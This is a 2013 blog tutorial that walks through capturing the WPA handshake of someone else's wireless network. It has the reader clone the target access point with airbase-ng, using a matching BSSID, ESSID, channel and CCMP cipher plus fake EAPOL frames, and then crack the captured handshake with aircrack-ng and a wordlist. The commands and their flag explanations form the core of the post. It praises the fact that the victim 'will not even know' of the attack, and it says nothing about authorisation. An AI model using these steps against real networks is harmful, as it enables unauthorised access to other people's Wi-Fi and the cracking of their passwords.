Sunday, March 3, 2013

ANOTHER EASY WAY TO GET THE WPA HANDSHAKE

Hey guys,

here's my another tutorial on how to get the WPA HANDSHAKE (for cracking WPA encryption) in an VERY EASY WAY !!


PRE-REQUISITES



# You Should have a wireless card which supports "PACKET INJECTION".

# Your wireless card should be on the monitor mode (Recommended) 

# Naaaaaa that's all :P



ok then Lets Start...


# Run airodump-ng to start monotoring the air.

airodump-ng mon0

if you have wireless networks in the vicinity then you'll be able to see a list of networks.


# choose a network for which you want to get the WPA HANDSHAKE.



#After Selecting the Network, you need the following info. from that network :



BSSID (MAC Address of the AP)
ESSID (Name of the AP)
CHANNEL
CIPHER TYPE

# Now open a new terminal and type the following command:

airbase-ng -a <bssid> --essid "<essid>" -c <channel> -F <location> -v -z 4 -V 3 -P -I 10 -C 15 mon0

-a bssid         : set Access Point MAC address
-v                  : verbose (print more messages)
-c channel     : sets the channel the AP is running on
-z type          : sets WPA1 cipher tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type         : same as -z, but for WPA2
-V type        : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix      : write all sent and received frames into pcap file
-P                : respond to all probes, even when specifying ESSIDs
-I interval     : sets the beacon interval value in ms
-C seconds  : enables beaconing of probed ESSID values (requires -P)

#Airbase is a tool used for creating a fake AP. Here create the fake AP with the same BSSID, ESSID, CHANNEL and CIPHER type as the network's that you want to get the WPA HANDSHAKE from.

in the above, i used the "-z 4" switch which tells that the network has a CCMP cipher type and in "-V 3", i am generating fake EAPOL packets.


#Now comes the Signal Game, if you have a higher signal strength than the other network, then without even deautheticating the clients, you'll get the WPA HANDSHAKE.


"Here is the best part, the client will not even know that his/her network is under attack :D :D
because we are not deauthenticating him/her from the AP  :D :D"


here you see "Client <client_mac> is associated (WPA1:CCMP) to BSSID: <essid> "

this means that the client is connected with your fake AP and we have just received the WPA handshake (You still need atleast 3-4 messages like that to properly get the WPA handshake)

# now just close it... your done !! :P


#for checking if we got the WPA handshake or not, run this command:

aircrack-ng <location of the pcap file> -w <wordlist>



as you can see here, i have got a handshake 




That's all ...


i hope its helpful to you all :-)




Thanks for reading !!

No comments:

Post a Comment